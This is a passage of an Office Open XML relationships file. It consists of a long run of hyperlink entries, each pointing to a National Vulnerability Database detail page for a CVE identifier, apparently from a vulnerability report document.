Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73253" TargetMode="External" Id="rId663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73256" TargetMode="External" Id="rId664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73257" TargetMode="External" Id="rId665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73309" TargetMode="External" Id="rId666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73311" TargetMode="External" Id="rId667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73312" TargetMode="External" Id="rId668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73475" TargetMode="External" Id="rId669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75156" TargetMode="External" Id="rId670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75160" TargetMode="External" Id="rId671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75340" TargetMode="External" Id="rId672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75431" TargetMode="External" Id="rId673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75595" TargetMode="External" Id="rId674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75746" TargetMode="External" Id="rId675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77337" TargetMode="External" Id="rId676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78327" TargetMode="External" Id="rId677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78328" TargetMode="External" Id="rId678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78361" TargetMode="External" Id="rId679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79571" TargetMode="External" Id="rId680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80164" TargetMode="External" Id="rId681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80181" TargetMode="External" Id="rId682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80424" TargetMode="External" Id="rId683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81468" TargetMode="External" Id="rId684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81939" TargetMode="External" Id="rId685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84939" TargetMode="External" Id="rId686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85043" TargetMode="External" Id="rId687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85184" TargetMode="External" Id="rId688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86729" TargetMode="External" Id="rId689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86840" TargetMode="External" Id="rId690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87806" TargetMode="External" Id="rId691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88007" TargetMode="External" Id="rId692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88044" TargetMode="External" Id="rId693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89043" TargetMode="External" Id="rId694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89086" TargetMode="External" Id="rId695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-54603" TargetMode="External" Id="rId696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10090" TargetMode="External" Id="rId697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53581" TargetMode="External" Id="rId698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62988" TargetMode="External" Id="rId699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66768" TargetMode="External" Id="rId700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67403" TargetMode="External" Id="rId701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68484" TargetMode="External" Id="rId702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69251" TargetMode="External" Id="rId703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69253" TargetMode="External" Id="rId704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69854" TargetMode="External" Id="rId705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71851" TargetMode="External" Id="rId706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73302" TargetMode="External" Id="rId707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73407" TargetMode="External" Id="rId708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73842" TargetMode="External" Id="rId709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75604" TargetMode="External" Id="rId710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82021" TargetMode="External" Id="rId711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85982" TargetMode="External" Id="rId712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86259" TargetMode="External" Id="rId713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87613" TargetMode="External" Id="rId714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87911" TargetMode="External" Id="rId715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-30156" TargetMode="External" Id="rId716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21441" TargetMode="External" Id="rId717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30864" TargetMode="External" Id="rId718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44432" TargetMode="External" Id="rId719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47746" TargetMode="External" Id="rId720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48019" TargetMode="External" Id="rId721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50093" TargetMode="External" Id="rId722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5598" TargetMode="External" Id="rId723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5706" TargetMode="External" Id="rId724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61666" TargetMode="External" Id="rId725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72772" TargetMode="External" Id="rId726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79921" TargetMode="External" Id="rId727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82866" TargetMode="External" Id="rId728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86165" TargetMode="External" Id="rId729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-52251" TargetMode="External" Id="rId730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-20701" TargetMode="External" Id="rId731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-56798" TargetMode="External" Id="rId732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-67030" TargetMode="External" Id="rId733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-70151" TargetMode="External" Id="rId734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-9049" TargetMode="External" Id="rId735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12648" TargetMode="External" Id="rId736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12651" TargetMode="External" Id="rId737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13622" TargetMode="External" Id="rId738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13739" TargetMode="External" Id="rId739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13761" TargetMode="External" Id="rId740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14359" TargetMode="External" Id="rId741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14828" TargetMode="External" Id="rId742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16101" TargetMode="External" Id="rId743" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16502" TargetMode="External" Id="rId744" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16745" TargetMode="External" Id="rId745" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-1784" TargetMode="External" Id="rId746" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18198" TargetMode="External" Id="rId747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18341" TargetMode="External" Id="rId748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18480" TargetMode="External" Id="rId749" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18486" TargetMode="External" Id="rId750" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18617" TargetMode="External" Id="rId751" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18851" TargetMode="External" Id="rId752" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19291" TargetMode="External" Id="rId753" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19292" TargetMode="External" Id="rId754" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19293" TargetMode="External" Id="rId755" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19298" TargetMode="External" Id="rId756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19546" TargetMode="External" Id="rId757" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19633" TargetMode="External" Id="rId758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19887" TargetMode="External" Id="rId759" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21092" TargetMode="External" Id="rId760" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27140" TargetMode="External" Id="rId761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27606" TargetMode="External" Id="rId762" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28609" TargetMode="External" Id="rId763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28618" TargetMode="External" Id="rId764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28666" TargetMode="External" Id="rId765" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30754" TargetMode="External" Id="rId766" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-31936" TargetMode="External" Id="rId767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32590" TargetMode="External" Id="rId768" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33001" TargetMode="External" Id="rId769" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33240" TargetMode="External" Id="rId770" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39944" TargetMode="External" Id="rId771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40858" TargetMode="External" Id="rId772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41870" TargetMode="External" Id="rId773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42016" TargetMode="External" Id="rId774" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43112" TargetMode="External" Id="rId775" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44829" TargetMode="External" Id="rId776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4601" TargetMode="External" Id="rId777" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48050" TargetMode="External" Id="rId778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48054" TargetMode="External" Id="rId779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49050" TargetMode="External" Id="rId780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49221" TargetMode="External" Id="rId781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49228" TargetMode="External" Id="rId782" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49255" TargetMode="External" Id="rId783" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49467" TargetMode="External" Id="rId784" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49473" TargetMode="External" Id="rId785" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49879" TargetMode="External" Id="rId786" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49882" TargetMode="External" Id="rId787" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50186" TargetMode="External" Id="rId788" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50191" TargetMode="External" Id="rId789" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50768" TargetMode="External" Id="rId790" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51974" TargetMode="External" Id="rId791" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52691" TargetMode="External" Id="rId792" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52775" TargetMode="External" Id="rId793" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52872" TargetMode="External" Id="rId794" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52876" TargetMode="External" Id="rId795" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53071" TargetMode="External" Id="rId796" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53277" TargetMode="External" Id="rId797" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53322" TargetMode="External" Id="rId798" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53527" TargetMode="External" Id="rId799" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53528" TargetMode="External" Id="rId800" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53542" TargetMode="External" Id="rId801" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53547" TargetMode="External" Id="rId802" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53706" TargetMode="External" Id="rId803" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54099" TargetMode="External" Id="rId804" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54721" TargetMode="External" Id="rId805" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55485" TargetMode="External" Id="rId806" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55509" TargetMode="External" Id="rId807" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55521" TargetMode="External" Id="rId808" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55541" TargetMode="External" Id="rId809" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55585" TargetMode="External" Id="rId810" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55637" TargetMode="External" Id="rId811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55676" TargetMode="External" Id="rId812" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57161" TargetMode="External" Id="rId813" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57162" TargetMode="External" Id="rId814" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57163" TargetMode="External" Id="rId815" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57866" TargetMode="External" Id="rId816" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58095" TargetMode="External" Id="rId817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58096" TargetMode="External" Id="rId818" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61574" TargetMode="External" Id="rId819" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62316" TargetMode="External" Id="rId820" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62357" TargetMode="External" Id="rId821" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62666" TargetMode="External" Id="rId822" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62706" TargetMode="External" Id="rId823" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62744" TargetMode="External" Id="rId824" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62895" TargetMode="External" Id="rId825" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64364" TargetMode="External" Id="rId826" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65772" TargetMode="External" Id="rId827" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66814" TargetMode="External" Id="rId828" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66818" TargetMode="External" Id="rId829" /><Relationship 